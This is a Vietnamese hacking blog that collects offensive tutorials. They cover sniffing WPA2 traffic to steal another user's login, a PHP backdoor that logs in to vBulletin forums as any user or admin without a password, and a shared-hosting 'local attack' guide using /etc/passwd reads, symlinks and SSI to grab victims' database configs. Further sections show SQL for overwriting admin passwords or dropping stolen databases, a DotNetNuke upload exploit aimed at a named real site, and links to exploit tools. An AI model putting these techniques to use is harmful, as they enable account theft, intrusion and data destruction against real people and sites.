Chủ Nhật, 22 tháng 12, 2013

Sniff and Decrypt WPA2 packet

Mô hình thực hiện của tut:


A và B đều biết password wifi của AP ( C )
Mục đích : Trên laptop của mình A sẽ sniff và giải mã các gói tin B-> C
Các bước thực hiện :
Bước 1 :
Các bạn vào :

Mã:
http://www.wireshark.org/tools/wpa-psk.html

Trong đó :
Passphrase là password mạng wifi( đã biết)
SSID : SSID của mạng wifi ( đã biết)
Bấm vào Generate, copy lấy đoạn PSK sinh ra
Bước 2:
Tại máy của mình A mở cửa sổ terminal gõ các lệnh sau ( dưới quyền root)
Mã:
iwlist wlan0 scanning

Mục đích : tìm thông tin những AP gần với A, chú ý tới channel của AP C( ở đây là channel 10)

Gõ tiếp :
Mã:
iwconfig wlan0 channel 10

Chuyển card mạng wifi máy A sang monitor mode, chỉ lắng nghe trên channel 10
Mã:
service NetworkManager stop
iwconfig wlan0 mode monitor
ifconfig wlan0 up
wireshak


Trên cửa sổ wireshark hiện ra vào
Mã:
Edit-> Preferences->Protocols ->IEEE 802.11


Check vào Enable decryption
Key #1 : wpa-pskSad dòng psk đã lấy được ở bước 1)
Bấm ok
Trên cửa sổ wireshark bấm vào
Mã:
Capture-> Interfaces
chọn wlan0 và bấm start
Bước 3:
Người B bắt đầu bật wifi trên mobile và vào trang :
Mã:
http://ceh.vn/@4rum/index.php

Sign in với user và password của mình ( tôi sử dụng user : mylove14129, pass : abcxyz..)
Bước 4:
Người A trên cửa sổ wireshark thử filter :
Mã:
wlan.addr[0:1]==8c and eapol

Lọc lấy các gói tin eapol có 2 byte đầu tiên của địa chỉ MAC = 8c ( Ở đây là địa chỉ MAC của mobile B)
Ok. đã thấy các gói tin eapol giữa AP và B

Lọc tiếp :
Mã:
http.request.method==POST


Chú ý tới dòng
Mã:
POST /@4rum/member.php

Ở trường :
Mã:
Line-base text data : username=mylove14129&password=abcxyz....



đã thu được user và pasword B dùng để đăng nhập vào ceh
end.
Tài liệu liên quan :
Mã:
1.http://en.wikipedia.org/wiki/IEEE_802.11i-2004
2. http://www.vocal.com/secure-communication/eapol-extensible-authentication-protocol-over-lan/
3. http://www.vjol.info/index.php/JSTD/article/viewFile/2698/2688
4. http://www.hvaonline.net/hvaonline/posts/list/41009.hva
5. http://wiki.wireshark.org/DisplayFilters
6.http://wiki.wireshark.org/HowToDecrypt802.11

Thứ Tư, 18 tháng 12, 2013

Fakelogin - Đăng nhập vào forum VBB không cần pass

Fakelogin - Đăng nhập vào forum VBB không cần pass

Code này có tác dụng là khi upload vào thư mục root của forum VBB các bạn có khả năng đăng nhập vào nick bất cứ thành viên nào mà không cần password. Ngoài ra vào đc thẳng admincp mà ko cần gõ lại pass


Sau đây là code


Code:
    if (isset($_GET['bd']))
    {
    define('THIS_SCRIPT', 'login');
    require_once('./global.php');
    require_once('./includes/functions_login.php');
    $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'");
    if (!$vbulletin->userinfo['userid']) die("Invalid username!");
    else
    {
    vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
    vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
    exec_unstrike_user($_GET['bd']);
    process_new_login('cplogin', TRUE, TRUE);
    do_login_redirect();
    }
    }

    ?>
 
 Copy đoạn code trên vào notepad save đuôi *.php



    Upload vào thư mục chứa forum ngang hàng với file index.php



    Sau đó chạy link sau



    http://domain.com/forum/*.php?bd=username 

Hướng dẫn tổng hợp, chi tiết cơ bản nhất các bước để local một victim.

Bài viết này dựa trên kinh nghiệm cũng như những kiến thức mà mình thấy cần thiết nhất và dễ hiểu nhất để dành cho những bạn nào chưa biết đến Local sau khi đọc xong sẽ biết đến nó và có thể thực hành ở đa số các trường hợp.

I. Đầu tiên là đọc sơ cái Định Nghĩa của Local Attack là gì cái nào:

Local attack là kỹ thuật hack website bằng hình thức tấn công từ nội bộ bên trong. Nghĩa là tấn công vào một website có bảo mật kém chung server với website mục tiêu. Sau đó tấn công sang website mục tiêu bằng các kỹ thuật khác nhau để đạt được mục đích cuối cùng đó là chiếm được toàn quyền website mục tiêu (victim).
Lấy cái ví dụ cho dễ hiểu:

VD1:
+ Server là một cái PC có nhiều folder trên đó.
+ Mỗi folder tương ứng với 1 user toàn quyền trên nó.
+ Local attach đó là làm sao đứng từ folder này dòm ngó và chui vào được cái folder khác. 
VD2:
+ Server là một cái chung cư to đùng.
+ Folder là 1 căn hộ trong chung cư đó và chủ nhà là một em chân dài, da trắng, xinh tươi nằm trong đó.
+ Local attack là làm đủ mọi cách như đục tường, khoét vách phá cửa để vào nhà có em xinh tươi ấy và xxx được em ấy.

II. Những điều cần biết trước khi bắt đầu tấn công và kết thúc Local attack:

1. Xác định website mục tiêu cần tấn công. (victim)
2. Reverse IP để xac định các website khác nằm chung server với website mục tiêu (victim)
3. Tấn công vào 1 trong các website bất kỳ cùng server với website mục tiêu (victim) và chiếm quyền nó.
4. Bước 3 Thành công ta có quyền trên 1 site cùng server với victim. hay mọi người vẫn gào lên là CÓ SHELL RỒI.
5. Chính thức bắt đầu vào quá trình tấn công nội bộ - Local Attack.
6. Tìm thông tin của victim gồm user host, đường dẫn tới victim, file cấu hình của victim (config.php)
7. Tiến hành đủ mọi thủ đoạn, cách, chiêu để xem được NỘI DUNG của file config.php đó.
8. Có thông tin thì ta connect vào database của victim để chiếm quyền admin và up shell chiếm toàn quyền victim. 
=> Kết thúc local attack thành công (xxx được em chân dài xinh tươi ấy rồi :x )

III. Bắt đầu vào chi tiết các bước để Local attack 1 victim.
Ở đây ta bỏ qua các bước từ 1-5 và mặc định là những bước đó ta đã biết sử dụng shell cơ bản cũng như đã có shell trên cùng server victim, và trong phần này mình hướng dẫn dựa trên server có OS là Linux và không cố định ở Distro, kernel nào.Chúng ta bắt đầu vào được thứ 6.

6. Tìm thông tin của victim gồm user host, đường dẫn tới victim, file cấu hình của victim (config.php)
a. Tìm user của victim:

+ Để tìm user của victim ta có rất nhiều cách và cũng có nhiều công cụ để làm việc này riêng mình sẽ chú trọng vào lệnh để vào server linux nào cũng sài được.
- Lệnh : cat /etc/passwd này dùng để đọc nội dung của file passwd nằm trong thư mục etc trên hệ thông.File này chứa toàn bộ tên user của Linux OS


Code:
cat /etc/passwd
less /etc/passwd
...
Xem thêm: Tổng hợp những lệnh shell hay dùng khi local

- Xem chính xác domain nào tương ứng với user nào thì ta dùng lệnh:
đối với server dùng directadmin để quản lý host ta dùng: 
Code:
cat /etc/virtual/domainowners
Đối với server dùng cpanel để quản lý host ta dùng: 
Code:
ls -la /etc/valiases/tendomainvictim.com
chú ý: tendomainvictim.com chính là tên domain website victim cần tấn công vd tôi cần tấn công huynhdegroup.net thì tôi sài lệnh sau:
Code:
ls -la /etc/valiases/huynhdegroup.net
- Có thể dùng chức năng đọc file passwd của con shell các bạn đang sài để view cũng được và đó cũng là một cách nữa để tìm user victim.
- Còn rất nhiều cách để tìm user của victim như xem error log ...
vd : tail -n 10000 /var/log/httpd/domains/huynhdegroup.net.error.log
vd1: cat /usr/local/apache/logs/error_log | grep "huynhdegroup.net" >>"user.txt"

b. Tìm đường dẫn tới thư mục của victim.
Có nhiều cách để xem đường dẫn của victim như check lỗi trực tiếp để hiện thông báo lỗi kèm theo user, path cụ thể... nhưng ở đây là local attack nên mình đề cập đến vài cách tìm như sau:
- Tìm path dựa vào Path của victim chứ shell: ví dụ các bạn vào shell và thấy:
/home/huynhde/public_html/ thì chắc chắn là cấu trúc đường dẫn của victim cũng sẽ tương tự chỉ khác ở phần user mà thôi
=> /home/victim/public_html/
Việc đặt đường dẫn lưu website thì tùy mỗi server sẽ có nơi lưu khác nhau nhưng đa phần trên 90% sử dụng đường dẫn như mình đã nêu. còn lại thì các bạn tự suy ra dựa theo cách suy luận mình đá nói.

c. Tìm file cấu hình của victim (config.php)
Đây là bước quan trọng quyết định tới việc các bạn có thể chiếm được victim hay không phụ thuộc vào bước này.Mình hướng dẫn trong trường hợp đây là mã nguồn victim tự code
thường thì file config.php hay nằm chung thư mục với file index.php tuy nhiên một số người khi code sẽ đưa vào trong vài lớp folder để quản lý code và cách tìm đó là các bạn view nội dung file index.php (để biết view thì các bạn xem bước 7 tiếp theo) để ý các dòng includes các file như là:
Code:
./inc/config.php
./includes/config.php
./includes/db.php
./inc/dbconnect.php
...
Thường thì một số mã nguồn sẽ có đường dẫn file config cố định và các bạn phải tìm hiểu mã nguồn đó để biết được file config đó nằm đâu. mình sẽ giới thiệu vài mã nguồn thông dụng:
Code:
Vbulletin: /home/victim/public_html/includes/config.php
PHPBB: /home/victim/public_html/config.php
Joomla: /home/victim/public_html/configuration.php
WordPress: /home/victim/public_html/wp-config.php
ibp: /home/victim/public_html/conf_global.php
php-fusion: /home/victim/public_html/config.php
Smf: /home/victim/public_html/Settings.php
phpnuke: /home/victim/public_html/html/config.php
Xoops: /home/victim/public_html/mainfile.php
ZenCart: /home/victim/public_html/includes/configure.php
setidio: /home/victim/public_html/datas/config.php
Discuz: /home/victim/public_html/config/config_ucenter.php
Bo-Blog: /home/victim/public_html/data/config.php
Biết được file config.php nằm đâu rồi thì chúng ta bắt đầu qua bước 7 để tiến hành xem nội dung file config đó

7. Tiến hành đủ mọi thủ đoạn, cách, chiêu để xem được NỘI DUNG của file config.php đó.
Có 2 cách thông dụng nhất để xem file config của victim đó là:

A. Dùng lệnh xem file như: cat, less, more nếu server cho phép (tiếc là đa số không cho phép cách này :( )
vd: cat /home/huynhde/public_html/@VHB@/includes/config.php
vd: cat /home/huynhde/public_html/configuration.php
vd: cat /home/huynhde/public_html/wp-config.php
...

B. Dùng phương pháp Symlinks: đây là phương pháp phổ biến nhất và đa số là hơn 95% sử dụng nó.
Symbolic Links là gì?
Symbolic links, vẫn được biết đến với cái tên symlinks, về cơ bản là biện pháp tạo shortcut nâng cao. Nguời dùng có thể tạo các liên kết tượng trưng cho các file hoặc thư mục riêng lẻ, sau đó các liên kết này sẽ xuất hiện như thể chúng được lưu trong cùng thư mục với liên kết tượng trưng mặc dù liên kết tượng trưng lại trỏ đến vị trí thực của chúng.
Có nhiều cách để tiến hành tạo symlinks nhưng mình đề cập đến dùng lệnh symlinks cho cơ bản nhất.Sau đó mới tới việc dùng các tool để khai thác.Để symlinks ta dùng lệnh ln kèm theo tùy chọn cho nó bạn muốn tạo symlinks đến file config.php của victim tên huynhde sau khi đã biết chính xác đường dẫn của nó ta làm như sau:

vd: ta đứng từ site http://dienthoailocal.com/local/shell.php cùng server vớihttp://huynhdegroup.net/@VHB@/ và ta sẽ tạo symlinks tới file config.php của huynhde như sau:
Code:
ls -s /home/huynhde/public_html/@VHB@/includes/config.php 1.txt
-> chạy lệnh này trên shell xong thì ta sẽ có được file 1.txt cùng folder với con shell nếu ta ko đổi thư mục trước khi symlinks.
Lúc này ta có thể xem nội dung của file 1.txt bằng nhiều cách như:
1. Xem trực tiếp bằng lệnh cat hay less: 

Code:
cat 1.txt
less 1.txt
...
2. Xem trực tiếp trên trình duyệt dạng domainshell.com/1.txt
vd: http://dienthoailocal.com/local/shell.php 
sau khi symlink ta sẽ xem như sau 
http://dienthoailocal.com/local/1.txt

Đối với một số server sẽ không cho phép ta xem trực tiếp như trên thì chúng ta sẽ dùng thêm file .htaccessvới nội dung bên dưới để hỗ trợ xem file symlinks:

Code:
Options Indexes FollowSymLinks
DirectoryIndex index.htm
AddType txt .php
AddHandler txt .php
3. Nếu vẫn tiếp tục không xem được thì sẽ có 2 khả năng xảy ra: đó là do server chặn không cho xem và do victim đã chmod phân quyền cho file đó.
+ Đối với việc server chặn không cho xem bằng mod SSI thì chúng ta hay dùng chính SSI để xem file đã symlink bằng cách tạo 1 file SSI có:
- Tên: saocungduoc.shtml
- nội dung:
Code:
<!--#include virtual="1.txt" -->
- Save lại và xem như sau: http://dienthoailocal.com/local/saocungduoc.shtml
Ở trường hợp này thì một số server chúng ta sẽ thấy nó hiện hết nội dung lên liền ở tranghttp://dienthoailocal.com/local/saocungduoc.shtml này.
Tuy nhiên cũng có một số server chúng ta sẽ tháy nó trắng tinh như màng trinh :( lúc này mọi người chịu khó click chuột phải vào chỗ nào trắng nhất và chọn View Source để xem màng trinh nhé =))
- Nếu đã view Source mà không xem được nữa thì chắc nó rơi vào trường hợp bị chmod kỹ hoặc chúng ta symlink bị sai đường dẫn :D

4. Dùng tool để bypass symlink: PHP 5.2.12/5.3.1 symlink() open_basedir bypass
Mọi người xem bài viết này để sử dụng nhé:
Tool bypass symlink 5.2.12 - 5.3.1 - open_basedir


Kết thúc một số phương pháp tạo và xem file config của victim.

8. Có thông tin thì ta connect vào database của victim để chiếm quyền admin và up shell chiếm toàn quyền victim.
Việc connect này thì cũng có nhiều cách nếu bạn nào thích dùng trên giao diện thì xem bài này:
Mã nguồn công cụ thao tác với MySQL qua giao diện


Còn những ai thích thì có thể dùng chức năng connect với database trên con shell bằng cách nhập user database, password database và tên database vào rồi connect sau đó dùng câu lệnh query làm gì tùy các bạn.

Copyyyyyyyy

_Trong loạt bài share này mình sẽ hướng dẫn bà toan cách sử lý khi trong tay có những cái mà quan trọng sau mà không biết ứng sử và sử lý nó ra sao

+ có trong tay data và user name nhưng ko biết cách kết nối vào để sử lý dữ liệu đó ra sao
Đặt ra nhiều trường hợp ( biết vận động cái đầu chút )
nếu host dùng directadmin admin và koloxo thì vẫn có thể connect đc vào Mysql vẫn có thể update user và pass ( điều nầy thì ko cần nói nhiều)
Nhưng nó dùng cpanel thì sao , cái này mới khốn ( trường hợp không có shell nhé)
_ Giải pháp cho mấy bé đây
+ xác định ip và tìm sẵn link admin ( nếu là vbb khi khỏi có cách upload shell qua data)
+ Máy cài visual 2010 hay bản bao nhiêu thì tùy
+http://dev.mysql.com/downloads/connector/net/1.0.html download bản này về import vào C# , để khai báo thư viện MySql
+ Việc đơn giản còn lại là kết nối với data mà ta đã vô tình hoặc trộm cắp ở đâu thì tùy với câu lệnh kết nối vào Mysql như sau
================================

String connString = "Server = IP host đã xác định bước trên ; Database = data đã trôm được;Port = 3306 ( cổng kết nối của Mysql); User ID = User Mysql;Password";
MySqlConnection conn = new MySqlConnection(connString);
MySqlCommand Command();
Conman = conn.CreateCommand();
Command.CommandText = "Câu Lệnh SQL"; //

ví dụ như
UPDATE `user` SET "password" = "69e53e5ab9536e55d31ff533aefc4fbe'", salt = "p5T" WHERE `userid` = "1"

còn chơi khăm hơn thì

DROP DATABASE `tên data`;

và Nhấn F5 xem thành quả thâu :v

thực chất ra đây cũng chỉ là 1 chút tư duy trong hacking thôi .....Quan trọng là biết cách suy nghĩ

còn đây là video UpShell qua database

Sẽ ra mắt tools connect Mysql và Auto UpLoad Shell for VBB

_ 1 vài video tìm lại
_Video Bypass Chatbox WorldOfHacked =))
http://www.mediafire.com/download/88olep119kiqy1o/bypasschatbox.rar
+ Hack Tiền quán nét
http://www.mediafire.com/download/qglc9r4jt5cnl1u/tmt_cheattime.rar
Ưu điểm có thể gian lận đc nếu biết cách
Nhược điểm : chủ quán biết là chỉ có ăn dép thẳng vào mồm
_Hack Shop Auto V5
http://www.mediafire.com/download/drhi5o3nsc9tblt/hackshop.rar
Chỉ là dùng 1 đoạn java nhỏ để Get Table và colums
_Upload Shell PhpMyadmin
http://www.mediafire.com/download/463c3r7k33f1vzx/upshell.rar
_Local Id Apache
http://www.mediafire.com/download/dtu9zb8u6zkf9gy/local_apache.rar
_Và mấy thằng bợn nhợn chúng nó khai thác web DAV như thế nào
http://www.mediafire.com/download/4b1a1d45o7pk7kw/exploit_server_win_DAV.rar
_Test Local Attack qua FXPFlash
http://www.mediafire.com/download/h3lmylp39so4w95/bypassflasfxp.rar

Hack forum với method DNN !!!

tìm các forum lỗi với dork chính sau
inurl:/portals/0/default.aspx
inurl:/tabid/36/language/en-US/Default.aspx

Mình tùy biến đi để có dork cho site việt nam nhé

inurl:"/portals/0? site:..vn



chọn 1 thằng làm victim nhé,
mình chọn thằng này 
http://www.viglaceraland.vn/
chạy trên browser 
http://www.viglaceraland.vn/Provider...nkgallery.aspx
sẽ cho như sau




nó ko cho up file từ máy tính
ta chạy script sau javascript:__doPostBack('ctlURL$cmdUpload','')

thì nhận đc là




nó đã cho up load từ máy tính nhé.ta up thử 1 file txt nào
up file capuchino.txt nhé 

chạy thử nha http://www.viglaceraland.vn/Portals/0/capuchino.txt
--->từ đây suy ra đường dẫn các file tương tự nhé 



nó cho up file ảnh,thì ta có thể up shell thông qua up file ảnh nha,trên firefox mình ko chạy javascript đc nên ko demo chỗ này đc ^^ :v

Có Thể bạn chưa biết

1.Facebook có thể login bằng các pass khác nhau.
Có nghĩa là bạn có thể cónhiều pass khác nhau.Sau đây là các pass tương đương nhau.
Ví dụ mình có pass là sAd_CaPuChiNo .Nếu mình hóan đổi các kí tự in hoa bằng kí tự thường và ngược lại.Được pass mới là SaD_cApUcHInO .Thi đây là một pass hợp lệ.Có thể login đc lun. Họăc nếu viết hoa kí tự đầu SAd_CaPuChiNo thì đây cũng là 1 pass hợp lệ.

2.Bạn có thể post lên facebook nguời khác mà không cần đăng nhập ( ko cần pass hay cookie gì cả).
Chỉ cần dụ đối tượng vào link sau đây m.facebook.com/upload.php?rdr và dụ victim gửi cái email trong đó cho bạn.Ùi bạn dùng email của mình.Gửi vào email vừa nhận đc.Với subject là dòng nội dung sẽ hiện lên tường của đối tượng đó.Có thể upload hình nữa nha.

3.Có thể bypass verify Phone khi đăng kí Gmail ,facebook, yahoo

Bạn có thể vào 1 trong các site sau đây http://receive-sms-online.com/ hoặc http://k7.net/ .Vào đó chọn 1 số nào đó,rồi nhập số đó vào nơi yêu cầu bạn phone verification.Và bạn sẽ nhận đc code xác nhận ở trang này.

4. Fake ip siêu nhanh bằng cách cài addon "AnonymoX Add Ons" trên firefox.

5. Có thể remove pass file rar .

Bằng cách vào trang này http://archive.online-convert.com/convert-to-zip up file cần lên.Bạn sẽ nhận đc một file không còn pass.Và nội dung cũng biến mất luôn =))

 
Design by mkha.hero